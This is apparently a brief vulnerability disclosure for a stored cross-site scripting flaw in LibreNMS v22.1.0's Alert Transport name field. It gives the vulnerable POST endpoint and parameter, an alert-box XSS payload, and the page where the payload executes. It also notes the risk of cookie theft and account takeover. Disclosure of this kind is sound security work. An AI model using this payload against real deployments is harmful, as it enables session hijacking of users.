Cross-Site Scripting vulnerability in LibreNMS v22.1.0 which allows attackers to execute arbitrary javascript code which affected Alerts module (Alert Transport) in Transport name field.
1 POST http://{HOST}/ajax_form.php - Parameter name
~
'><body onload=alert("TName")>
~
1 http://{HOST}/alert-transports
~
1 payload
This vulnerability is capable of running malicious javascript code on web pages, stealing a user’s cookie and gain unauthorized access to that user’s account through the stolen cookie.